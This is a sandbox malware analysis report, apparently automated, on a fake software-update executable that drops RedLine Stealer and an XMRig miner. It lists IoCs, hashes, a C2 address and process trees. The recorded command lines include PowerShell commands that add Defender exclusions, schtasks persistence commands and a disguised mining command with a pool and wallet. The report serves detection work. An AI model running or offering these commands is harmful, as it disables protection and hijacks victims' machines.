Analysis
max time kernel: 149s
max time network: 145s
platform: windows10_x64
resource: win10-en-20210920
submitted: 26-10-2021 15:33
Static task: static1
Behavioral task: behavioral1 (sample: Software updated by Dylox.exe; resource: win7-en-20211014)
Behavioral task: behavioral2 (sample: Software updated by Dylox.exe; resource: win10-en-20210920)
Behavioral task: behavioral3 (sample: Software-update-patc_828811790.exe; resource: win7-en-20210920)
Behavioral task: behavioral4 (sample: Software-update-patc_828811790.exe; resource: win10-en-20211014)
Behavioral task: behavioral5 (sample: open this if the doesn't work.exe; resource: win7-en-20210920)
Behavioral task: behavioral6 (sample: open this if the doesn't work.exe; resource: win10-en-20211014)
General
Target: Software updated by Dylox.exe
Size: 3.2MB
MD5: 6f78118b606c3c7c9bad1a9e0671cda8
SHA1: 00abbc6a45d7009d8e166794289b39d0bb709ba5
SHA256: 7be5baa4d9a45af1e6f15fdf6600537ed78e1694f9daa37741b5e8c3e58d7005
SHA512: 77d474c0a67754e7f71ee1c932cd4f21bcbd1f94472ffd9c21cbe2c6242f5fa07f5fede82255b9037cff87fbde614225105db3b6a55be560dfc10ac74149d916
Malware Config
Extracted
redline
Youtube
185.203.240.16:1249
Signatures
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
RedLine Payload 2 IoCs
Processes (resource, yara_rule):
  behavioral2/memory/760-140-0x0000000000400000-0x0000000000420000-memory.dmp  family_redline
  behavioral2/memory/760-141-0x0000000000418D32-mapping.dmp  family_redline
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
XMRig Miner Payload 2 IoCs
Processes (resource, yara_rule):
  behavioral2/memory/3016-505-0x000000014030F3F8-mapping.dmp  xmrig
  behavioral2/memory/3016-511-0x0000000140000000-0x0000000140786000-memory.dmp  xmrig
Downloads MZ/PE file
Executes dropped EXE 8 IoCs
Processes (pid, process):
  4044 Datafile32.exe
  1016 Datafile64.exe
  2196 Server32.exe
  760 Server32.exe
  3116 services32.exe
  760 services64.exe
  1512 sihost32.exe
  2324 sihost64.exe
Checks BIOS information in registry 2 TTPs 6 IoCs
BIOS information is often read in order to detect sandboxing environments.
Processes (description, ioc, process):
  Key value queried  \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion  Datafile64.exe
  Key value queried  \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion  Datafile64.exe
  Key value queried  \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion  services64.exe
  Key value queried  \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion  services64.exe
  Key value queried  \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion  Software updated by Dylox.exe
  Key value queried  \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion  Software updated by Dylox.exe
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
Processes (resource, yara_rule):
  behavioral2/memory/2848-118-0x0000000001020000-0x0000000001021000-memory.dmp  themida
  C:\Users\Admin\AppData\Local\Temp\Datafile64.exe  themida
  C:\Users\Admin\AppData\Local\Temp\Datafile64.exe  themida
  behavioral2/memory/1016-129-0x0000000000400000-0x0000000000EAE000-memory.dmp  themida
  C:\Windows\System32\services64.exe  themida
  C:\Windows\system32\services64.exe  themida
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
Processes (description, ioc, process):
  Key value queried  \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA  Software updated by Dylox.exe
  Key value queried  \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA  Datafile64.exe
  Key value queried  \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA  services64.exe
Legitimate hosting services abused for malware hosting/C2 1 TTPs
Drops file in System32 directory 4 IoCs
Processes (description, ioc, process):
  File created  C:\Windows\system32\services64.exe  conhost.exe
  File opened for modification  C:\Windows\system32\services64.exe  conhost.exe
  File created  C:\Windows\system32\Microsoft\Libs\sihost64.exe  conhost.exe
  File created  C:\Windows\system32\Microsoft\Libs\WR64.sys  conhost.exe
Suspicious use of NtSetInformationThreadHideFromDebugger 3 IoCs
Processes (pid, process):
  2848 Software updated by Dylox.exe
  1016 Datafile64.exe
  760 services64.exe
Suspicious use of SetThreadContext 2 IoCs
Processes (description, pid, process, target process):
  PID 2196 (Server32.exe) set thread context of 760 (Server32.exe)
  PID 1504 (conhost.exe) set thread context of 3016 (nslookup.exe)
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
Creates scheduled task(s) 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
Processes (pid, process):
  3640 schtasks.exe
  1932 schtasks.exe
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes (pid, process; 64 IoCs shown, repeated entries collapsed):
  1408 conhost.exe
  1992 powershell.exe (×3)
  3196 powershell.exe (×3)
  760 Server32.exe
  2132 conhost.exe
  2416 powershell.exe (×3)
  396 powershell.exe (×3)
  2772 conhost.exe (×2)
  3800 powershell.exe (×3)
  1704 powershell.exe (×3)
  1504 conhost.exe (×2)
  1716 powershell.exe (×3)
  3016 nslookup.exe (×36, remainder of the 64 listed entries)
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes (token, pid, process; 64 IoCs shown, grouped by process):
  2848 Software updated by Dylox.exe: SeDebugPrivilege
  1408 conhost.exe: SeDebugPrivilege
  1992 powershell.exe: SeDebugPrivilege, SeIncreaseQuotaPrivilege, SeSecurityPrivilege, SeTakeOwnershipPrivilege, SeLoadDriverPrivilege, SeSystemProfilePrivilege, SeSystemtimePrivilege, SeProfSingleProcessPrivilege, SeIncBasePriorityPrivilege, SeCreatePagefilePrivilege, SeBackupPrivilege, SeRestorePrivilege, SeShutdownPrivilege, SeDebugPrivilege, SeSystemEnvironmentPrivilege, SeRemoteShutdownPrivilege, SeUndockPrivilege, SeManageVolumePrivilege, 33, 34, 35, 36
  3196 powershell.exe: SeDebugPrivilege, SeIncreaseQuotaPrivilege, SeSecurityPrivilege, SeTakeOwnershipPrivilege, SeLoadDriverPrivilege, SeSystemProfilePrivilege, SeSystemtimePrivilege, SeProfSingleProcessPrivilege, SeIncBasePriorityPrivilege, SeCreatePagefilePrivilege, SeBackupPrivilege, SeRestorePrivilege, SeShutdownPrivilege, SeDebugPrivilege, SeSystemEnvironmentPrivilege, SeRemoteShutdownPrivilege, SeUndockPrivilege, SeManageVolumePrivilege, 33, 34, 35, 36
  760 Server32.exe: SeDebugPrivilege
  2132 conhost.exe: SeDebugPrivilege
  2416 powershell.exe: SeDebugPrivilege, SeIncreaseQuotaPrivilege, SeSecurityPrivilege, SeTakeOwnershipPrivilege, SeLoadDriverPrivilege, SeSystemProfilePrivilege, SeSystemtimePrivilege, SeProfSingleProcessPrivilege, SeIncBasePriorityPrivilege, SeCreatePagefilePrivilege, SeBackupPrivilege, SeRestorePrivilege, SeShutdownPrivilege, SeDebugPrivilege, SeSystemEnvironmentPrivilege, SeRemoteShutdownPrivilege (list ends at the 64-IoC display limit)
Suspicious use of WriteProcessMemory 64 IoCs
Processes (pid, process, target process; 64 IoCs shown, repeated entries collapsed):
  2848 Software updated by Dylox.exe wrote to memory of 4044 Datafile32.exe (×2)
  2848 Software updated by Dylox.exe wrote to memory of 1016 Datafile64.exe (×2)
  2848 Software updated by Dylox.exe wrote to memory of 2196 Server32.exe (×3)
  2196 Server32.exe wrote to memory of 760 Server32.exe (×8)
  4044 Datafile32.exe wrote to memory of 1408 conhost.exe (×3)
  1408 conhost.exe wrote to memory of 1620 cmd.exe (×2)
  1620 cmd.exe wrote to memory of 1992 powershell.exe (×2)
  1408 conhost.exe wrote to memory of 3044 cmd.exe (×2)
  3044 cmd.exe wrote to memory of 3640 schtasks.exe (×2)
  1620 cmd.exe wrote to memory of 3196 powershell.exe (×2)
  1016 Datafile64.exe wrote to memory of 2132 conhost.exe (×3)
  2132 conhost.exe wrote to memory of 3632 cmd.exe (×2)
  3632 cmd.exe wrote to memory of 2416 powershell.exe (×2)
  2132 conhost.exe wrote to memory of 1332 cmd.exe (×2)
  1332 cmd.exe wrote to memory of 1932 schtasks.exe (×2)
  1408 conhost.exe wrote to memory of 3620 cmd.exe (×2)
  3620 cmd.exe wrote to memory of 3116 services32.exe (×2)
  3632 cmd.exe wrote to memory of 396 powershell.exe (×2)
  2132 conhost.exe wrote to memory of 1496 cmd.exe (×2)
  1496 cmd.exe wrote to memory of 760 services64.exe (×2)
  3116 services32.exe wrote to memory of 2772 conhost.exe (×3)
  2772 conhost.exe wrote to memory of 428 cmd.exe (×2)
  428 cmd.exe wrote to memory of 3800 powershell.exe (×2)
  2772 conhost.exe wrote to memory of 1512 sihost32.exe (×2)
  428 cmd.exe wrote to memory of 1704 powershell.exe (×2)
  1512 sihost32.exe wrote to memory of 3112 conhost.exe (×3)
  760 services64.exe wrote to memory of 1504 conhost.exe (×1)
Processes (tree depth in brackets; cmd = command line as recorded)
[1] C:\Users\Admin\AppData\Local\Temp\Software updated by Dylox.exe
    cmd: "C:\Users\Admin\AppData\Local\Temp\Software updated by Dylox.exe"
    - Checks BIOS information in registry
    - Checks whether UAC is enabled
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
  [2] C:\Users\Admin\AppData\Local\Temp\Datafile32.exe
      cmd: "C:\Users\Admin\AppData\Local\Temp\Datafile32.exe"
      - Executes dropped EXE
      - Suspicious use of WriteProcessMemory
    [3] C:\Windows\System32\conhost.exe
        cmd: "C:\Windows\System32\\conhost.exe" "C:\Users\Admin\AppData\Local\Temp\Datafile32.exe"
        - Suspicious behavior: EnumeratesProcesses
        - Suspicious use of AdjustPrivilegeToken
        - Suspicious use of WriteProcessMemory
      [4] C:\Windows\System32\cmd.exe
          cmd: "cmd" cmd /c powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force" & powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force" & exit
          - Suspicious use of WriteProcessMemory
        [5] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            cmd: powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force"
            - Suspicious behavior: EnumeratesProcesses
            - Suspicious use of AdjustPrivilegeToken
        [5] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            cmd: powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force"
            - Suspicious behavior: EnumeratesProcesses
            - Suspicious use of AdjustPrivilegeToken
      [4] C:\Windows\System32\cmd.exe
          cmd: "cmd" /c schtasks /create /f /sc onlogon /rl highest /tn "services32" /tr "C:\Users\Admin\services32.exe"
          - Suspicious use of WriteProcessMemory
        [5] C:\Windows\system32\schtasks.exe
            cmd: schtasks /create /f /sc onlogon /rl highest /tn "services32" /tr "C:\Users\Admin\services32.exe"
            - Creates scheduled task(s)
      [4] C:\Windows\System32\cmd.exe
          cmd: "cmd" cmd /c "C:\Users\Admin\services32.exe"
          - Suspicious use of WriteProcessMemory
        [5] C:\Users\Admin\services32.exe
            cmd: C:\Users\Admin\services32.exe
            - Executes dropped EXE
            - Suspicious use of WriteProcessMemory
          [6] C:\Windows\System32\conhost.exe
              cmd: "C:\Windows\System32\\conhost.exe" "C:\Users\Admin\services32.exe"
              - Suspicious behavior: EnumeratesProcesses
              - Suspicious use of WriteProcessMemory
            [7] C:\Windows\System32\cmd.exe
                cmd: "cmd" cmd /c powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force" & powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force" & exit
                - Suspicious use of WriteProcessMemory
              [8] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  cmd: powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force"
                  - Suspicious behavior: EnumeratesProcesses
              [8] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  cmd: powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force"
                  - Suspicious behavior: EnumeratesProcesses
            [7] C:\Users\Admin\AppData\Roaming\Microsoft\Telemetry\sihost32.exe
                cmd: "C:\Users\Admin\AppData\Roaming\Microsoft\Telemetry\sihost32.exe"
                - Executes dropped EXE
                - Suspicious use of WriteProcessMemory
              [8] C:\Windows\System32\conhost.exe
                  cmd: "C:\Windows\System32\\conhost.exe" "/sihost32"
  [2] C:\Users\Admin\AppData\Local\Temp\Datafile64.exe
      cmd: "C:\Users\Admin\AppData\Local\Temp\Datafile64.exe"
      - Executes dropped EXE
      - Checks BIOS information in registry
      - Checks whether UAC is enabled
      - Suspicious use of NtSetInformationThreadHideFromDebugger
      - Suspicious use of WriteProcessMemory
    [3] C:\Windows\System32\conhost.exe
        cmd: "C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Local\Temp\Datafile64.exe"
        - Drops file in System32 directory
        - Suspicious behavior: EnumeratesProcesses
        - Suspicious use of AdjustPrivilegeToken
        - Suspicious use of WriteProcessMemory
      [4] C:\Windows\System32\cmd.exe
          cmd: "cmd" cmd /c powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force" & powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force" & exit
          - Suspicious use of WriteProcessMemory
        [5] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            cmd: powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force"
            - Suspicious behavior: EnumeratesProcesses
            - Suspicious use of AdjustPrivilegeToken
        [5] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            cmd: powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force"
            - Suspicious behavior: EnumeratesProcesses
      [4] C:\Windows\System32\cmd.exe
          cmd: "cmd" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Windows\system32\services64.exe"
          - Suspicious use of WriteProcessMemory
        [5] C:\Windows\system32\schtasks.exe
            cmd: schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Windows\system32\services64.exe"
            - Creates scheduled task(s)
      [4] C:\Windows\System32\cmd.exe
          cmd: "cmd" cmd /c "C:\Windows\system32\services64.exe"
          - Suspicious use of WriteProcessMemory
        [5] C:\Windows\system32\services64.exe
            cmd: C:\Windows\system32\services64.exe
            - Executes dropped EXE
            - Checks BIOS information in registry
            - Checks whether UAC is enabled
            - Suspicious use of NtSetInformationThreadHideFromDebugger
            - Suspicious use of WriteProcessMemory
          [6] C:\Windows\System32\conhost.exe
              cmd: "C:\Windows\System32\conhost.exe" "C:\Windows\system32\services64.exe"
              - Drops file in System32 directory
              - Suspicious use of SetThreadContext
              - Suspicious behavior: EnumeratesProcesses
            [7] C:\Windows\System32\cmd.exe
                cmd: "cmd" cmd /c powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force" & powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force" & exit
              [8] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  cmd: powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force"
              [8] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  cmd: powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force"
                  - Suspicious behavior: EnumeratesProcesses
            [7] C:\Windows\system32\Microsoft\Libs\sihost64.exe
                cmd: "C:\Windows\system32\Microsoft\Libs\sihost64.exe"
                - Executes dropped EXE
              [8] C:\Windows\System32\conhost.exe
                  cmd: "C:\Windows\System32\conhost.exe" "/sihost64"
            [7] C:\Windows\System32\nslookup.exe
                cmd: C:\Windows/System32\nslookup.exe --cinit-find-x -B --algo="rx/0" --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=pool.hashvault.pro:80 --user=459jfEXyVheN7bBBRJPjJY7jH8nCKFZKdZrBcyPK6q4b7mQnrxN3sSmU8wAcuVvMxP6sumE9x28XSRCgLgyBvT4VENVJbTQ --pass= --cpu-max-threads-hint=50 --cinit-remote-config="v4Qq47ngFyBcSyO2uLKc6NiP86mD8cW+f6jtmqjmEDLY00XM3Bo2fOksM1LJ6Dgf" --cinit-stealth-targets="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" --cinit-idle-wait=5 --cinit-idle-cpu=80 --cinit-stealth
                - Suspicious behavior: EnumeratesProcesses
  [2] C:\Users\Admin\AppData\Local\Temp\Server32.exe
      cmd: "C:\Users\Admin\AppData\Local\Temp\Server32.exe"
      - Executes dropped EXE
      - Suspicious use of SetThreadContext
      - Suspicious use of WriteProcessMemory
    [3] C:\Users\Admin\AppData\Local\Temp\Server32.exe
        cmd: C:\Users\Admin\AppData\Local\Temp\Server32.exe
        - Executes dropped EXE
        - Suspicious behavior: EnumeratesProcesses
        - Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Matrix ATT&CK v6
Downloads
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\conhost.exe.log
  MD5: 84f2160705ac9a032c002f966498ef74
  SHA1: e9f3db2e1ad24a4f7e5c203af03bbc07235e704c
  SHA256: 7840ca7ea27e8a24ebc4877774be6013ab4f81d1eb83c121e4c3290ceb532d93
  SHA512: f41c289770d8817ee612e53880d3f6492d50d08fb5104bf76440c2a93539dd25f6f15179b318e67b9202aabbe802941f80ac2dbadfd6ff1081b0d37c33f9da57
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
  MD5: 8592ba100a78835a6b94d5949e13dfc1
  SHA1: 63e901200ab9a57c7dd4c078d7f75dcd3b357020
  SHA256: fdd7d9def6f9f0c0f2e60dbc8a2d1999071cd7d3095e9e087bb1cda7a614ac3c
  SHA512: 87f98e6cb61b2a2a7d65710c4d33881d89715eb7a06e00d492259f35c3902498baabffc5886be0ec5a14312ad4c262e3fc40cd3a5cb91701af0fb229726b88c3
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Server32.exe.log
  MD5: 41fbed686f5700fc29aaccf83e8ba7fd
  SHA1: 5271bc29538f11e42a3b600c8dc727186e912456
  SHA256: df4e9d012687cdabd15e86bf37be15d6c822e1f50dde530a02468f0006586437
  SHA512: 234b2235c1ced25810a4121c5eabcbf9f269e82c126a1adc363ee34478173f8b462e90eb53f5f11533641663350b90ec1e2360fd805b10c041fab12f4da7a034
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
  MD5: 91f58c55452f07632f3747097335621b
  SHA1: e30b2caebaf73e683dc4d2990ef87924580e1d52
  SHA256: 2e7e2d429b53606ef0eab9a5b8b6902019be497dbf0dd0bb63ed134408dbe727
  SHA512: c61a0c1bb05e620e00260710b6bdf68db9358afea449424deed22050688a26c393c4a6c40117371f66c12bffd1a319919ebb7ee4c0d932b27d3f8253c87f3764
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
  MD5: 9d15151d47657c4f551820e55337c2da
  SHA1: 8aa655c0b87bbd3c5212816c3b402849a8d4284e
  SHA256: dcf73bcb5a54efbba464e8fae8e6d9cb961a371e10f04c44ae28d4b5a6243656
  SHA512: 1ce44057ba13375e465377ad8c9881a854e7aadfaa7cbc365d06efdc8ef5674ba69f0a2a05fe2db829386ef6e54796d6676f5f99b61c849209e5f01ef598cb18
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
  MD5: 2e3da96b53c8914fe47b7ff32e72ef98
  SHA1: 1c92ee7c32c302a3a527168dcf744508ca711082
  SHA256: 9d56479b18affb519eaa5a8a5415205c8a2b4b76aa6982a28f3a0cdb3641c5e0
  SHA512: 480e073b9030cc9d633887d1f22421d9166a2a94080b8d81b1ab589e293d8110445d0aa4bd3089e0e28cf26bf657e486d67cfdda5476e854502bf7c1ee202b99
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
  MD5: 95a9df5ab7468c20f2ac763163239ff3
  SHA1: eeeb7537d55c70177f54fde3d5dcd143c3432ff8
  SHA256: 723f16b62cdd5138527881d04fb6cba0834d1e5b44c6a3a972dc71f6f16d274b
  SHA512: acbfec25f10cbbbbd54586d8bd75d9799d6a16cfbe574961b2982bafa74a5671b7c099bcac122829da8f2d43a75ba88817146548b98bb4dd11b53fa0d91c45ca
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
  MD5: 30e0bfd5342d3e14b551c37ff1a22ea2
  SHA1: 21f2dbfdd5ab8fee1ba142016aed5bf933a60a4c
  SHA256: 8b629c5626f79773b5b41235ffd4e2d152732a782b30e6f2194e098dc280ba65
  SHA512: cc90d26f663b519a74c5812b12e6f4a4a8c738169b2d318def97f3ef0af378076b01811368f5e523016b11a0b9b5800a595b01815309bf15e017e5e59edf7606
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
  MD5: 195f354e5855a0d1cc7efaa8362cf594
  SHA1: e271f3840bcb8611a41fdc43e736b0502c1701f1
  SHA256: 4560bd87169bf8b75e118e53741350606cf755e6b9eaf7afb2e6bf1416bbfd7b
  SHA512: 240905885440b415b7b4b13f73ce190b2cf22f6bec84408fca6c9fc9d4f2fcf2e707b0c1e1e95b815e4fe426d9360bcc2fcf74318c378cec2133d4424784e555
C:\Users\Admin\AppData\Local\Temp\Datafile32.exe (listed 2×)
  MD5: 55f246c4f670bddc2e1c6fab66fb9af8
  SHA1: b2737bf54e19008f7230830c987e9cc45ca9dba7
  SHA256: 4c8b5fba12ebb583a444831e1a9759ef724f2d9f37c595e8afb22dbbdabf6bc8
  SHA512: c124240ded2271bc125e88ea6f4cc4625915809a13d66ebf8c32677436f043340b92bc50283835d212c9b40edcea5d458c2663a1d5be5038154b1eb1560628fe
C:\Users\Admin\AppData\Local\Temp\Datafile64.exe (listed 2×)
  MD5: f87ec0d92f1e1c57e281c3b7207264a4
  SHA1: 452ee705af24c36bb2235fc969dd122ede448e7b
  SHA256: 5e5c5c47ac45012b8fe6c40877d111d17b1ae3108fb1bb6ff4ab6e154d256f1c
  SHA512: 8e141c0a78dadafc241a70b1298fd35e223c18eaecceb7ea17bba05c4626e40e5c578757e0510a4db23f99dfb7439371f2ec6fe25252c50f4e3e89b30be37052
C:\Users\Admin\AppData\Local\Temp\Server32.exe (listed 3×)
  MD5: 7190f3a53c0e5247c2b7ece197acddea
  SHA1: 495b35f241df11b61ddc781ac64e2a3f24d6915b
  SHA256: 646277abb30792f37cece3371b61387555cd16874ba01f59b3e19120467b9ad3
  SHA512: cde3a5d415f51f302d793e1c9fcc11768f3bfea7cf0544fccb3210a3cebc0d3437d3104ae896ebf95dd0bcf3e7d0639ef43a69cdf97015a9591d3b6beb121aad
C:\Users\Admin\AppData\Roaming\Microsoft\Telemetry\sihost32.exe (listed 2×)
  MD5: a48e4ecd100871e98f3b6128f9b37187
  SHA1: 8adf645a05d8ede551aadaaf51a37a47071497b9
  SHA256: b141d0c63cfd6c373f4721eba43014c7ce9e1d3b10aabcefe17750abb9b55283
  SHA512: bd481ddabcce4b9a1cbc95f0067058937effde93cc02c69785fc80ecdc99417753cf1696c1a1e337578256e98763e7e975845fd6aca71d4c3610ddd7eb20cda1
C:\Users\Admin\services32.exe (listed 2×)
  MD5: 55f246c4f670bddc2e1c6fab66fb9af8
  SHA1: b2737bf54e19008f7230830c987e9cc45ca9dba7
  SHA256: 4c8b5fba12ebb583a444831e1a9759ef724f2d9f37c595e8afb22dbbdabf6bc8
  SHA512: c124240ded2271bc125e88ea6f4cc4625915809a13d66ebf8c32677436f043340b92bc50283835d212c9b40edcea5d458c2663a1d5be5038154b1eb1560628fe
C:\Windows\System32\Microsoft\Libs\sihost64.exe
  MD5: ab0e8cd9d9374369b972868842a74471
  SHA1: d457b0f8ba1b3d1bd98fae16ea36a46ae04013a3
  SHA256: 873b123e6c5909c6a08f02649d7a47b172851f3b8e28a670a2ced2b4f8b036ea
  SHA512: 91d56a14ca18e316033cd938fbcdd48faa83ff8964185c2db9fbacdb200aab8c863c17c066f25e05afcd87746dc5909ecf59cfdb2920fb95528a5735d09c9afb
C:\Windows\System32\services64.exe
  MD5: f87ec0d92f1e1c57e281c3b7207264a4
  SHA1: 452ee705af24c36bb2235fc969dd122ede448e7b
  SHA256: 5e5c5c47ac45012b8fe6c40877d111d17b1ae3108fb1bb6ff4ab6e154d256f1c
  SHA512: 8e141c0a78dadafc241a70b1298fd35e223c18eaecceb7ea17bba05c4626e40e5c578757e0510a4db23f99dfb7439371f2ec6fe25252c50f4e3e89b30be37052
C:\Windows\system32\Microsoft\Libs\sihost64.exe
  MD5: ab0e8cd9d9374369b972868842a74471
  SHA1: d457b0f8ba1b3d1bd98fae16ea36a46ae04013a3
  SHA256: 873b123e6c5909c6a08f02649d7a47b172851f3b8e28a670a2ced2b4f8b036ea
  SHA512: 91d56a14ca18e316033cd938fbcdd48faa83ff8964185c2db9fbacdb200aab8c863c17c066f25e05afcd87746dc5909ecf59cfdb2920fb95528a5735d09c9afb
C:\Windows\system32\services64.exe
  MD5: f87ec0d92f1e1c57e281c3b7207264a4
  SHA1: 452ee705af24c36bb2235fc969dd122ede448e7b
  SHA256: 5e5c5c47ac45012b8fe6c40877d111d17b1ae3108fb1bb6ff4ab6e154d256f1c
  SHA512: 8e141c0a78dadafc241a70b1298fd35e223c18eaecceb7ea17bba05c4626e40e5c578757e0510a4db23f99dfb7439371f2ec6fe25252c50f4e3e89b30be37052
memory/396-347-0x000001DF8E790000-0x000001DF8E792000-memory.dmp  Filesize: 8KB
memory/396-349-0x000001DF8E796000-0x000001DF8E798000-memory.dmp  Filesize: 8KB
memory/396-352-0x000001DF8E798000-0x000001DF8E799000-memory.dmp  Filesize: 4KB
memory/396-348-0x000001DF8E793000-0x000001DF8E795000-memory.dmp  Filesize: 8KB
memory/396-314-0x0000000000000000-mapping.dmp
memory/428-371-0x0000000000000000-mapping.dmp
memory/760-151-0x0000000004F10000-0x0000000004F11000-memory.dmp  Filesize: 4KB
memory/760-153-0x0000000005220000-0x0000000005221000-memory.dmp  Filesize: 4KB
memory/760-157-0x0000000006720000-0x0000000006721000-memory.dmp  Filesize: 4KB
memory/760-147-0x0000000004E60000-0x0000000004E61000-memory.dmp  Filesize: 4KB
memory/760-150-0x0000000004DF0000-0x00000000053F6000-memory.dmp  Filesize: 6.0MB
memory/760-149-0x0000000004EC0000-0x0000000004EC1000-memory.dmp  Filesize: 4KB
memory/760-140-0x0000000000400000-0x0000000000420000-memory.dmp  Filesize: 128KB
memory/760-357-0x0000000000000000-mapping.dmp
memory/760-148-0x0000000004F90000-0x0000000004F91000-memory.dmp  Filesize: 4KB
memory/760-141-0x0000000000418D32-mapping.dmp
memory/760-146-0x0000000005400000-0x0000000005401000-memory.dmp  Filesize: 4KB
memory/1016-128-0x0000000000401000-0x0000000000403000-memory.dmp  Filesize: 8KB
memory/1016-124-0x0000000000000000-mapping.dmp
memory/1016-129-0x0000000000400000-0x0000000000EAE000-memory.dmp  Filesize: 10.7MB
memory/1332-275-0x0000000000000000-mapping.dmp
memory/1344-554-0x0000023B6D100000-0x0000023B6D106000-memory.dmp  Filesize: 24KB
memory/1344-565-0x0000023B6EBE6000-0x0000023B6EBE7000-memory.dmp  Filesize: 4KB
memory/1344-563-0x0000023B6EBE0000-0x0000023B6EBE2000-memory.dmp  Filesize: 8KB
memory/1344-564-0x0000023B6EBE3000-0x0000023B6EBE5000-memory.dmp  Filesize: 8KB
memory/1408-160-0x00000230EDA30000-0x00000230EDA32000-memory.dmp  Filesize: 8KB
memory/1408-158-0x00000230EDA30000-0x00000230EDA32000-memory.dmp  Filesize: 8KB
memory/1408-175-0x00000230EDA30000-0x00000230EDA32000-memory.dmp  Filesize: 8KB
memory/1408-159-0x00000230EDA30000-0x00000230EDA32000-memory.dmp  Filesize: 8KB
memory/1408-166-0x00000230EDA30000-0x00000230EDA32000-memory.dmp  Filesize: 8KB
memory/1408-183-0x00000230ED8B0000-0x00000230ED8BF000-memory.dmp  Filesize: 60KB
memory/1408-184-0x00000230EF570000-0x00000230EF572000-memory.dmp  Filesize: 8KB
memory/1408-185-0x00000230EF573000-0x00000230EF575000-memory.dmp  Filesize: 8KB
memory/1408-161-0x00000230EDA30000-0x00000230EDA32000-memory.dmp  Filesize: 8KB
memory/1408-162-0x00000230EDA60000-0x00000230EDA6C000-memory.dmp  Filesize: 48KB
memory/1408-186-0x00000230EF576000-0x00000230EF577000-memory.dmp  Filesize: 4KB
